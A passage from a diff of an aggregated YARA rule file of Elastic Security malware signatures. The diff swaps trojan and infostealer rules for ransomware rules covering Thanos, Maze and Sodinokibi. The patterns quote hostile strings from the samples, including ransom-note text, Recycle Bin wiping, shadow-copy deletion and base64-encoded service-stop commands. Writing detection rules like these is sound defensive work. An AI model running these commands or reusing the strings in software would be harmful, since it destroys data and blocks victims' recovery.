80 90 55 00 30 00 39 00 47 00 56 00 46 00 64 00 42 00 55 00 6B 00 56 00 63 00 54 00 57 00 6C 00 6A 00 63 00 6D 00 39 00 7A 00 62 00 32 00 5A 00 30 00 58 00 46 00 64 00 70 00 62 00 6D 00 52 00 76 00 64 00 33 00 4D 00 67 00 54 00 6C 00 52 00 63 00 51 00 33 00 56 00 79 00 63 00 6D 00 56 00 75 00 64 00 46 00 5A 00 6C 00 63 00 6E 00 4E 00 70 00 62 00 32 00 35 00 63 00 56 00 32 00 6C 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + 1 of ($b*) } -rule ELASTIC_Windows_Infostealer_Phemedronestealer_Bed8Ea8A : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Thanos_E19Feca1 : BETA FILE MEMORY { meta: - description = "Detects Windows Infostealer Phemedronestealer (Windows.Infostealer.PhemedroneStealer)" + description = "Identifies THANOS (Hakbit) ransomware" author = "Elastic Security" - id = "bed8ea8a-f2a3-4a51-ae57-4986da4d21aa" - date = "2024-03-21" - modified = "2024-05-08" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Infostealer_PhemedroneStealer.yar#L1-L30" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "38279fdad25c7972be9426cadb5ad5e3ee7e9761b0a41ed617945cb9a3713702" - logic_hash = "88fc33abfe6c7a611aa0c354645b06e9e74121ffc9a5acd20b4d3a59287489d6" + id = "e19feca1-b131-4045-be0c-d69d55f9a83e" + date = "2020-11-03" + modified = "2021-08-23" + reference = "https://labs.sentinelone.com/thanos-ransomware-riplace-bootlocker-and-more-added-to-feature-set/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Thanos.yar#L46-L77" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "1f5a69b6749e887a5576843abb83388d5364e47601cf11fcac594008ace8e973" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "29702a2dc8b20c230ffef00dfff725133b707e35523e075ff85484a20da3c760" + tags = "BETA, FILE, MEMORY" + fingerprint = "d6654d0b3155d9c64fd4e599ba34d51f110d9dfda6fa1520b686602d9f608f92" + threat_name = "Windows.Ransomware.Thanos" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -75503,39 +75942,40 @@ rule ELASTIC_Windows_Infostealer_Phemedronestealer_Bed8Ea8A : FILE MEMORY os = "windows" strings: - $a1 = "b_" - $a2 = "b_" - $a3 = "b_" - $a4 = "b_" - $a5 = "b_" - $a6 = "b_" - $b1 = "Phemedrone.Senders" - $b2 = "Phemedrone.Protections" - $b3 = "Phemedrone.Extensions" - $b4 = "Phemedrone.Cryptography" - $b5 = "Phemedrone-Report.zip" - $b6 = "Phemedrone Stealer Report" + $a1 = "b__" + $a2 = "b__" + $a3 = "b__" + $a4 = "b__" + $b1 = "Your files are encrypted." + $b2 = "I will treat you good if you treat me good too." + $b3 = "I don't want to loose your files too" + $b4 = "/c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin" wide fullword + $b5 = "\\HOW_TO_DECYPHER_FILES.txt" wide fullword + $b6 = "c3RvcCBTUUxURUxFTUVUUlkkRUNXREIyIC95" wide fullword + $b7 = "c3RvcCBNQkFNU2VydmljZSAveQ==" wide fullword + $b8 = "L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsIA==" wide fullword + $b9 = "c3RvcCBjY0V2dE1nciAveQ==" wide fullword condition: - all of ($a*) or all of ($b*) + (4 of ($a*)) or (3 of ($b*)) } -rule ELASTIC_Linux_Trojan_Pornoasset_927F314F : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Sodinokibi_2883D7Cd : FILE MEMORY { meta: - description = "Detects Linux Trojan Pornoasset (Linux.Trojan.Pornoasset)" + description = "Detects Linux Ransomware Sodinokibi (Linux.Ransomware.Sodinokibi)" author = "Elastic Security" - id = "927f314f-2cbb-4f87-b75c-9aa5ef758599" - date = "2021-01-12" - modified = "2021-09-16" + id = "2883d7cd-fd3b-47a5-9283-a40335172c62" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Pornoasset.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93" - logic_hash = "7267375346c1628e04c8272c24bde04a5d6ae2b420f64dfe58657cfc3eecc0e7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Sodinokibi.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a322b230a3451fd11dcfe72af4da1df07183d6aaf1ab9e062f0e6b14cf6d23cd" + logic_hash = "97d6b1b641c4b5b596b67a809e8e70bb0bccb9219282cd6c41bc905e2ea44c84" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf" + fingerprint = "d6570a8e9358cef95388a72b2e7f747ee5092620c4f92a4b4e6c1bb277e1cb36" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -75543,28 +75983,28 @@ rule ELASTIC_Linux_Trojan_Pornoasset_927F314F : FILE MEMORY os = "linux" strings: - $a = { C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48 } + $a = { 85 08 FF FF FF 48 01 85 28 FF FF FF 48 8B 85 08 FF FF FF 48 29 85 20 FF } condition: all of them } -rule ELASTIC_Windows_Trojan_Blackwood_2B94Bce9 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Maze_61254061 : BETA FILE MEMORY { meta: - description = "Detects Windows Trojan Blackwood (Windows.Trojan.Blackwood)" + description = "Identifies MAZE ransomware" author = "Elastic Security" - id = "2b94bce9-a9cc-4b22-a9c7-2790553942b0" - date = "2024-03-22" - modified = "2024-05-08" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Blackwood.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c37dd77f659059da7e12e13b063036ee69097a4d2f88c170832fff78f3788991" - logic_hash = "279e85ce3bb974ce5af541e7307cb2fd1031f36c9da013756883172a765b0e19" + id = "61254061-e8af-47ab-9cce-96debd99a80a" + date = "2020-04-18" + modified = "2021-08-23" + reference = "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Maze.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "b8537add953cdd7bc6adbff97f7f5a94de028709f0bd71102ee96d26d55f4f20" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "1162bd3cc0f30cd927f5f2d7d5703204ce8df0d627944222e2dc4ae42d1ea99a" + tags = "BETA, FILE, MEMORY" + fingerprint = "670d9abbdea153ca66f24ef6806f97e9af3efb73f621167e95606da285627d1b" + threat_name = "Windows.Ransomware.Maze" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -75572,121 +76012,126 @@ rule ELASTIC_Windows_Trojan_Blackwood_2B94Bce9 : FILE MEMORY os = "windows" strings: - $a1 = { 5F 8C FB 62 69 00 65 00 78 00 70 00 6C 00 6F 00 72 00 65 00 2E 00 65 00 78 00 65 00 } - $a2 = { C6 44 24 0C 6D C6 44 24 0D 73 C6 44 24 0E 68 C6 44 24 10 70 C6 44 24 11 2E C6 44 24 12 64 } - $a3 = { 6D 79 6E 73 70 2E 64 6C 6C 00 4E 53 50 43 6C 65 61 6E 75 70 00 4E 53 50 53 74 61 72 74 75 70 } - $b1 = "index.dat" - $b2 = "Mozilla/4.0 (compatible;MSIE 5.0; Windows 98)" - $b3 = "http://www.baidu.com/id=%s&ad=%d&os=%d.%d&t=%d" - $b4 = "SetEntriesInAcl Error %u" - $b5 = "AllocateAndInitializeSid Error %u" + $c1 = { FC 8B 55 08 8B 44 8A 10 C1 E0 09 8B 4D FC 8B 55 08 8B 4C 8A 10 C1 } + $c2 = { 72 F0 0C 66 0F 72 D4 14 66 0F EB C4 66 0F 70 E0 39 66 0F FE E6 66 0F 70 } condition: - 1 of ($a*) or all of ($b*) + 1 of ($c*) } -rule ELASTIC_Linux_Trojan_Ddostf_E4874Cd4 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Maze_46F40C40 : BETA FILE MEMORY { meta: - description = "Detects Linux Trojan Ddostf (Linux.Trojan.Ddostf)" + description = "Identifies MAZE ransomware" author = "Elastic Security" - id = "e4874cd4-50e3-4a4c-b14c-976e29aaaaae" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ddostf.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1015b9aef1f749dfc31eb33528c4a4169035b6d73542e068b617965d3e948ef2" - logic_hash = "1523fe8f7bbbc7e42f8c2efe5b28dd381007846a1ba7078a6f1a30aedace884b" + id = "46f40c40-05a4-4163-a62d-675882149781" + date = "2020-04-18" + modified = "2021-10-04" + reference = "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Maze.yar#L23-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "99180f41aaaf1dfb0a8a40709dcc392fdbc2b2d3a4d4b4a1ab160dd5f2b4c703" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "dfbf7476794611718a1cd2c837560423e3a6c8b454a5d9eecb9c6f9d31d01889" + tags = "BETA, FILE, MEMORY" + fingerprint = "efe1e0d23fbfd72fd2843a9c8d5e62394ef8c75b9a7bd03fdbb36e2cf97bf12e" + threat_name = "Windows.Ransomware.Maze" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E4 01 8B 45 F0 2B 45 F4 89 C2 8B 45 E4 39 C2 73 82 8B 45 EC } + $b1 = "Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms" wide fullword + $b2 = "Maze Ransomware" wide fullword + $b3 = "%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! %s" wide fullword condition: - all of them + 2 of ($b*) } -rule ELASTIC_Linux_Trojan_Ddostf_32C35334 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Maze_20Caee5B : BETA FILE MEMORY { meta: - description = "Detects Linux Trojan Ddostf (Linux.Trojan.Ddostf)" + description = "Identifies MAZE ransomware" author = "Elastic Security" - id = "32c35334-f264-4509-b5c4-b07e477bd07d" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ddostf.yar#L21-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "d62d450d48756c09f8788b27301de889c864e597924a0526a325fa602f91f376" + id = "20caee5b-cf7f-4db7-8c3b-67baf63bfc32" + date = "2020-04-18" + modified = "2021-08-23" + reference = "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Maze.yar#L46-L71" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "e09c059b285d2176aeba1a1f70d39f13cef4e05dc023c7db25fb9d92bd9a67d9" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "f71d1e9188f67147de8808d65374b4e34915e9d60ff475f7fc519c8918c75724" + tags = "BETA, FILE, MEMORY" + fingerprint = "47525839e0800f6edec6ad4580682a336e36f7d13bd9e7214eca0f16941016b8" + threat_name = "Windows.Ransomware.Maze" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0E 18 41 0E 1C 41 0E 20 48 0E 10 00 4C 00 00 00 64 4B 00 00 } + $a1 = "Win32_ShadowCopy.id='%s'" wide fullword + $a2 = "\"%s\" shadowcopy delete" wide fullword + $a3 = "%spagefile.sys" wide fullword + $a4 = "%sswapfile.sys" wide fullword + $a5 = "Global\\%s" wide fullword + $a6 = "DECRYPT-FILES.txt" wide fullword + $a7 = "process call create \"cmd /c start %s\"" wide fullword condition: - all of them + 4 of ($a*) } -rule ELASTIC_Linux_Trojan_Ddostf_6Dc1Caab : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Maze_F88F136F : BETA FILE MEMORY { meta: - description = "Detects Linux Trojan Ddostf (Linux.Trojan.Ddostf)" + description = "Identifies MAZE ransomware" author = "Elastic Security" - id = "6dc1caab-be84-4f27-a059-2acffc20ca2c" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ddostf.yar#L40-L58" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f4587bd45e57d4106ebe502d2eaa1d97fd68613095234038d67490e74c62ba70" - logic_hash = "fd70960ed6e06f4d152bbd211fbe491dad596010da12cd53c93b577b551b8053" + id = "f88f136f-755c-46d6-9dbe-243342ae315a" + date = "2020-04-18" + modified = "2021-08-23" + reference = "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Maze.yar#L73-L94" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "5587f332a076650f6ad7b1e3b464ef6085d960e6dacf53607cf75c9f9ad07628" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "43bcb29d92e0ed2dfd0ff182991864f8efabd16a0f87e8c3bb453b47bd8e272b" + tags = "BETA, FILE, MEMORY" + fingerprint = "3fa065d28d864868e49b394e895207c8be2252a9e211ac4bacce10d9ff04607e" + threat_name = "Windows.Ransomware.Maze" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FC 01 83 45 F8 01 83 7D F8 5A 7E E6 C7 45 F8 61 00 00 00 EB 14 8B } + $d1 = { 00 67 00 20 00 69 00 6E 00 73 00 74 00 72 00 75 00 63 00 74 00 69 00 6F 00 6E 00 73 00 20 00 69 00 6E 00 20 00 44 00 45 00 43 00 52 00 59 00 50 00 54 00 2D 00 46 00 49 00 4C 00 45 00 53 00 2E } + $d2 = { 70 C7 8B 75 6D 97 7E FC 19 2A 39 8C A4 AE AD 9C 62 05 B7 68 47 7D 02 F7 D3 0A DA 20 82 AE A8 E7 B2 26 E1 A0 5B 4E 17 09 A6 94 74 CA B6 0B 88 B0 5F 6E 11 E3 B0 EA 2F 40 D7 A2 AB 59 52 E0 F2 C2 19 24 14 95 01 7F CA } + $d3 = { 77 B3 50 3C B1 9B 5D D4 87 F5 17 DB E1 C7 42 D8 53 24 C2 E2 6A A8 9B 1E FB E5 48 EB 10 48 44 28 64 F8 B6 A1 41 44 D0 42 FA 85 6F 17 57 09 C4 66 93 D2 21 C5 19 71 3A A1 C5 68 2E 67 B1 02 DC D1 } condition: - all of them + 1 of ($d*) } -rule ELASTIC_Linux_Trojan_Ddostf_Dc47A873 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ddostf_E4874Cd4 : FILE MEMORY { meta: description = "Detects Linux Trojan Ddostf (Linux.Trojan.Ddostf)" author = "Elastic Security" - id = "dc47a873-65a0-430d-a598-95be7134f207" + id = "e4874cd4-50e3-4a4c-b14c-976e29aaaaae" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ddostf.yar#L60-L78" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ddostf.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" hash = "1015b9aef1f749dfc31eb33528c4a4169035b6d73542e068b617965d3e948ef2" - logic_hash = "2f5bd9e012fd778388074cf29b56c7cd59391840f994835d087b7b661445d316" + logic_hash = "1523fe8f7bbbc7e42f8c2efe5b28dd381007846a1ba7078a6f1a30aedace884b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f103490a9dedc0197f50ca2b412cf18d2749c8d6025fd557f1686bc38f32db52" + fingerprint = "dfbf7476794611718a1cd2c837560423e3a6c8b454a5d9eecb9c6f9d31d01889" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -75694,444 +76139,114 @@ rule ELASTIC_Linux_Trojan_Ddostf_Dc47A873 : FILE MEMORY os = "linux" strings: - $a = { 05 88 10 8B 45 08 0F B6 10 83 E2 0F 83 CA 40 88 10 8B 45 08 C6 40 } + $a = { E4 01 8B 45 F0 2B 45 F4 89 C2 8B 45 E4 39 C2 73 82 8B 45 EC } condition: all of them } -rule ELASTIC_Linux_Trojan_Ddostf_Cb0358A0 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ddostf_32C35334 : FILE MEMORY { meta: description = "Detects Linux Trojan Ddostf (Linux.Trojan.Ddostf)" author = "Elastic Security" - id = "cb0358a0-5303-4860-89ac-7dae037f5f0b" + id = "32c35334-f264-4509-b5c4-b07e477bd07d" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ddostf.yar#L80-L98" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1015b9aef1f749dfc31eb33528c4a4169035b6d73542e068b617965d3e948ef2" - logic_hash = "1f152b69bf0b2bfa539fdd42c432e456b9efb3766a450333a987313bb12c1826" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "f97c96d457532f2af5fb0e1b40ad13dcfba2479c651266b4bdd1ab2a01c0360f" - severity = 100 - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" - os = "linux" - - strings: - $a = { 66 C7 45 F2 00 00 8D 45 F2 8B 55 E4 0F B6 12 88 10 0F B7 45 F2 0F } - - condition: - all of them -} -rule ELASTIC_Windows_Trojan_Afdk_C952Fcfa : FILE MEMORY -{ - meta: - description = "Detects Windows Trojan Afdk (Windows.Trojan.Afdk)" - author = "Elastic Security" - id = "c952fcfa-75e1-4880-a4e3-1e4cc89c160f" - date = "2023-12-01" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Afdk.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6723a9489e7cfb5e2d37ff9160d55cda065f06907122d73764849808018eb7a0" - logic_hash = "a0589a3bf9e733e615b6e552395b3ff513e4fad7efd7d2ebea634aa91d2f60d9" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "577b2f82944711a51e52eb35a0eaf17379576ae151dd820d8b442e8fed8a5373" - severity = 100 - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" - os = "windows" - - strings: - $a = { 55 8B EC 51 51 83 65 F8 00 8D 45 F8 83 65 FC 00 50 E8 80 FF FF FF 59 85 C0 75 2B 8B 4D 08 8B 55 F8 8B 45 FC 89 41 04 8D 45 F8 89 11 83 CA 1F 50 89 55 F8 E8 7B FF FF FF 59 85 C0 75 09 E8 DA 98 } - - condition: - all of them -} -rule ELASTIC_Windows_Trojan_Afdk_5F8Cc135 : FILE MEMORY -{ - meta: - description = "Detects Windows Trojan Afdk (Windows.Trojan.Afdk)" - author = "Elastic Security" - id = "5f8cc135-88b1-478d-aedb-0d60cee0bbf2" - date = "2023-12-01" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Afdk.yar#L21-L41" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6723a9489e7cfb5e2d37ff9160d55cda065f06907122d73764849808018eb7a0" - logic_hash = "0523a0cc3a4446f2ac88c72999568313c6b40f7f8975b8e332c0c6b1e48c5d76" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "275bfaac332f3cbc1164c35bdbc5cbe8bfd45559f6b929a0b8b64af2de241bd8" - severity = 100 - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" - os = "windows" - - strings: - $a1 = "Cannot set the log file name" - $a2 = "Cannot install the hook procedure" - $a3 = "Keylogger is up and running..." - - condition: - 2 of them -} -rule ELASTIC_Windows_Hacktool_Capcom_7Abae448 : FILE -{ - meta: - description = "Subject: CAPCOM Co.,Ltd." - author = "Elastic Security" - id = "7abae448-0ebc-433f-b368-0b8560da7197" - date = "2022-04-07" - modified = "2022-04-07" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_Capcom.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24" - logic_hash = "88f25c479cc8970e05ef9d08143afbbbfa17322f34379ba571e3a09105b33ee0" - score = 75 - quality = 75 - tags = "FILE" - fingerprint = "965e85fc3b2a21aef84c7c2bd59708b121d9635ce6bab177014b28fb00102884" - threat_name = "Windows.Hacktool.Capcom" - severity = 50 - arch_context = "x86" - scan_context = "file" - license = "Elastic License v2" - os = "windows" - - strings: - $subject_name = { 06 03 55 04 03 [2] 43 41 50 43 4F 4D 20 43 6F 2E 2C 4C 74 64 2E } - - condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $subject_name -} -rule ELASTIC_Macos_Trojan_Kandykorn_A7Bb6944 : FILE MEMORY -{ - meta: - description = "Detects Macos Trojan Kandykorn (MacOS.Trojan.KandyKorn)" - author = "Elastic Security" - id = "a7bb6944-90fa-40ba-840c-f044f12dcb39" - date = "2023-10-23" - modified = "2023-10-23" - reference = "https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_KandyKorn.yar#L1-L29" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "51dd4efcf714e64b4ad472ea556bf1a017f40a193a647b9e28bf356979651077" - logic_hash = "65decd519dee947894dd684c52d91202ebe5587acfecc0b8b56cd73f2981e387" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ddostf.yar#L21-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "d62d450d48756c09f8788b27301de889c864e597924a0526a325fa602f91f376" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f2b2ebc056c79448b077dce140b2a73d6791b61ddc8bf21d4c565c95f5de49e7" + fingerprint = "f71d1e9188f67147de8808d65374b4e34915e9d60ff475f7fc519c8918c75724" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" - - strings: - $str_1 = "resp_file_dir" - $str_2 = "resp_cfg_set" - $str_3 = "resp_proc_kill" - $str_4 = "/com.apple.safari.ck" ascii fullword - $str_5 = "/chkupdate.XXX" ascii fullword - $seq_file_dir = { 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 48 63 45 ?? 48 83 C0 ?? 48 8B 4D ?? 0F B7 49 ?? 48 01 C8 48 83 C0 01 48 3D 00 00 0A 00 0F 86 ?? ?? ?? ?? } - $seq_cmd_send = { 8B 45 ?? 83 F8 ?? 0F 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 78 ?? 48 8B 70 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? } - $seq_cfg_get = { 8B 45 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 48 8B 45 ?? 48 8B 38 48 8B 70 ?? 8B 55 ?? E8 ?? ?? ?? ?? 89 45 ?? E9 ?? ?? ?? ?? } - $seq_proc_list = { 48 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 4D ?? 48 8B 85 ?? ?? ?? ?? 89 48 ?? 8B 4D ?? 48 8B 85 ?? ?? ?? ?? 89 48 ?? 8B 4D ?? 48 8B 85 ?? ?? ?? ?? } - $rc4_key = { D9 F9 36 CE 62 8C 3E 5D 9B 36 95 69 4D 1C DE 79 E4 70 E9 38 06 4D 98 FB F4 EF 98 0A 55 58 D1 C9 0C 7E 65 0C 23 62 A2 1B 91 4A BD 17 3A BA 5C 0E 58 37 C4 7B 89 F7 4C 5B 23 A7 29 4C C1 CF D1 1B } - - condition: - 4 of ($str*) or 3 of ($seq*) or $rc4_key -} -rule ELASTIC_Linux_Trojan_Sysrv_85097F24 : FILE MEMORY -{ - meta: - description = "Detects Linux Trojan Sysrv (Linux.Trojan.Sysrv)" - author = "Elastic Security" - id = "85097f24-2e2e-41e4-8769-dca7451649cc" - date = "2021-06-28" - modified = "2021-09-16" - reference = "17fbc8e10dea69b29093fcf2aa018be4d58fe5462c5a0363a0adde60f448fb26" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sysrv.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "96bee8b9b0e9c2afd684582301f9e110fd08fcabaea798bfb6259a4216f69be1" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "1cad651c92a163238f8d60d2e3670f229b4aafd6509892b9dcefe014b39c6f7d" - severity = "100" - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" os = "linux" strings: - $a = { 32 26 02 0F 80 0C 0A FF 0B 02 02 22 04 2B 02 16 02 1C 01 0C 09 } + $a = { 0E 18 41 0E 1C 41 0E 20 48 0E 10 00 4C 00 00 00 64 4B 00 00 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Elby_65B09743 : FILE -{ - meta: - description = "Name: ElbyCDIO.sys, Version: 6.0.3.2" - author = "Elastic Security" - id = "65b09743-029d-456a-b7f4-3cd055a0e0e2" - date = "2022-04-07" - modified = "2022-04-07" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = 